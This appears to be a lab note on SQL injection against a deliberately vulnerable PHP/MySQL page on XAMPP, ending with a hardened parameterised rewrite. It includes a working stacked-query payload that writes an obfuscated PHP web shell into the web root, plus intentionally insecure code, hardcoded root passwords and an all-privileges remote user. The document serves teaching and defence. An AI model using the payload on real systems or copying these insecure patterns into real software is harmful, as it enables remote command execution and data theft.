sql injection
===

## setting

- install Firefox
- Run `.\mysqladmin --user=root --password= password` in `/xampp/mysql/bin` (sets the MySQL root password)
- set `/xampp/phpmyadmin/config.inc.php`

```php=
/* Authentication type and info */
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '1qaz@WSX';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Lang'] = '';
```

- set `httpd-xampp.conf`

```
Alias /phpmyadmin "C:/Users/sean/Desktop/xampp/phpMyAdmin/"
<Directory "C:/Users/sean/Desktop/xampp/phpMyAdmin">
    Options Indexes FollowSymLinks MultiViews
    AllowOverride all
    Order Deny,Allow
    Allow from all
    Require all granted
</Directory>
```

- create a SQL user that can only connect from localhost

```sql=
CREATE USER 'phpmyadmin'@'localhost' IDENTIFIED BY 'donthackeme';
GRANT ALL PRIVILEGES ON *.* TO 'phpmyadmin'@'localhost' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```

- create a SQL user that can connect from any host

```sql=
CREATE USER 'phpmyadmin'@'%' IDENTIFIED BY 'donthackme';
GRANT ALL PRIVILEGES ON *.* TO 'phpmyadmin'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```

## source

```php=
<html>
<head>
<style>
#customers {
    font-family: Arial, Helvetica, sans-serif;
    border-collapse: collapse;
    width: 100%;
}
#customers td, #customers th {
    border: 1px solid #ddd;
    padding: 8px;
}
#customers tr:nth-child(even) { background-color: #f2f2f2; }
#customers tr:hover { background-color: #ddd; }
#customers th {
    padding-top: 12px;
    padding-bottom: 12px;
    text-align: left;
    background-color: #4CAF50;
    color: white;
}
</style>
</head>
<?php
// connects as root, so the query runs with every privilege (including FILE)
$connection = new PDO('mysql:host=localhost;dbname=test;charset=utf8', 'root', '1qaz@WSX');
$id = $_GET['id'];
if (!$id) $id = 1;
// injection point: the raw GET parameter is concatenated into the SQL text
$statement = $connection->query('select * from blue where id=' . $id);
?>
<table id='customers'>
<tr>
    <td>id</td>
    <td>tank</td>
    <td>aircraft_carrier</td>
    <td>fighter</td>
</tr>
<?php
// column values are echoed without HTML escaping
foreach ($statement as $row) {
    echo "<tr><td>" . $row["id"] . "</td>";
    echo "<td>" . $row["tank"] . "</td>";
    echo "<td>" . $row["aircraft_carrier"] . "</td>";
    echo "<td>" . $row["fighter"] . "</td></tr>";
}
?>
</table>
<br><br>
<table id='customers'>
<tr>
    <td>id</td>
    <td>tank</td>
    <td>aircraft_carrier</td>
    <td>fighter</td>
</tr>
<?php
// second table: dumps the whole table so the effect of the injected query is visible
$statement = $connection->query('select * from blue');
foreach ($statement as $row) {
    echo "<tr><td>" . $row["id"] . "</td>";
    echo "<td>" . $row["tank"] . "</td>";
    echo "<td>" . $row["aircraft_carrier"] . "</td>";
    echo "<td>" . $row["fighter"] . "</td></tr>";
}
?>
</table>
</html>
```

## create table

```sql=
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";

CREATE TABLE `blue` (
  `id` int(11) NOT NULL,
  `tank` int(11) DEFAULT NULL,
  `aircraft_carrier` int(11) DEFAULT NULL,
  `fighter` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

INSERT INTO `blue` (`id`, `tank`, `aircraft_carrier`, `fighter`) VALUES
(1, 100, 200, 300),
(2, 400, 700, 200),
(3, 100, 200, 900),
(4, 400, 500, 200),
(5, 100, 600, 200),
(6, 800, 400, 200),
(7, 200, 200, 700);

ALTER TABLE `blue`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `blue`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
COMMIT;
```

## payload

```
127.0.0.1/sql.php?id=1;select 1, '<?php $y = "em";$a = "st";$g = "sy";$f = $g.$a.$y;$f($_GET["cmd"]); ?>' into outfile 'C:\\Users\\sean\\Desktop\\xampp\\htdocs\\cc.php'
```

- For a pure attack, a path disclosure is needed.
- you can look up xampp config from the shell.

## refer

- https://pjchender.blogspot.com/2015/08/php-data-objects-pdo.html
- https://www.bos.tw/2016/09/phpmyadmin%E7%99%BB%E5%85%A5mysql%EF%BC%8C%E9%8C%AF%E8%AA%A4%E8%A8%8A%E6%81%AF%E7%82%BA-error-1130-host-xxxx-is-not-allowed-to-connect-to-this-mysql-server/
- https://askubuntu.com/questions/763336/cannot-enter-phpmyadmin-as-root-mysql-5-7
- https://stackoverflow.com/questions/17816732/xampp-access-forbidden-php
- https://stackoverflow.com/questions/38522864/set-login-enable-for-phpmyadmin
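## fixed version

A hardened rewrite of the `id` lookup from the `source` section, added here as an example and not part of the original note: it validates `id` as an integer, binds it through a real server-side prepared statement, turns off stacked queries (so `1;select ... into outfile` cannot run as a second statement) and escapes output. The `webapp` account and its password are placeholders for a least-privilege user without `FILE` or `GRANT`, which is an assumption about the lab, not something the note sets up.

```php
<?php
// Added example, not from the original note: hardened version of the lookup
// in the "source" section. Same table (`blue`) and columns as the note.
$connection = new PDO(
    'mysql:host=localhost;dbname=test;charset=utf8',
    'webapp',      // assumption: low-privilege user, no FILE privilege, so INTO OUTFILE is refused
    'change-me',   // placeholder password
    [
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES       => false, // real server-side prepares
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false, // "1;select ..." is rejected as a second statement
    ]
);

// Validate: id must be a positive integer; anything else falls back to 1,
// matching the original page's default.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    $id = 1;
}

// Parameterised query: the value is bound, never spliced into the SQL text,
// so "1;select ..." or "1 or 1=1" is treated as a (rejected) integer, not as SQL.
$statement = $connection->prepare(
    'SELECT id, tank, aircraft_carrier, fighter FROM blue WHERE id = :id'
);
$statement->bindValue(':id', $id, PDO::PARAM_INT);
$statement->execute();

echo "<table id='customers'>";
echo "<tr><td>id</td><td>tank</td><td>aircraft_carrier</td><td>fighter</td></tr>";
foreach ($statement as $row) {
    // Escape on output so a stored value cannot inject HTML or script into the page.
    $cells = array_map(
        fn($v) => htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'),
        [$row['id'], $row['tank'], $row['aircraft_carrier'], $row['fighter']]
    );
    echo '<tr><td>' . implode('</td><td>', $cells) . '</td></tr>';
}
echo '</table>';
```

`MYSQL_ATTR_MULTI_STATEMENTS` only takes effect when passed to the PDO constructor, not via `setAttribute()` afterwards.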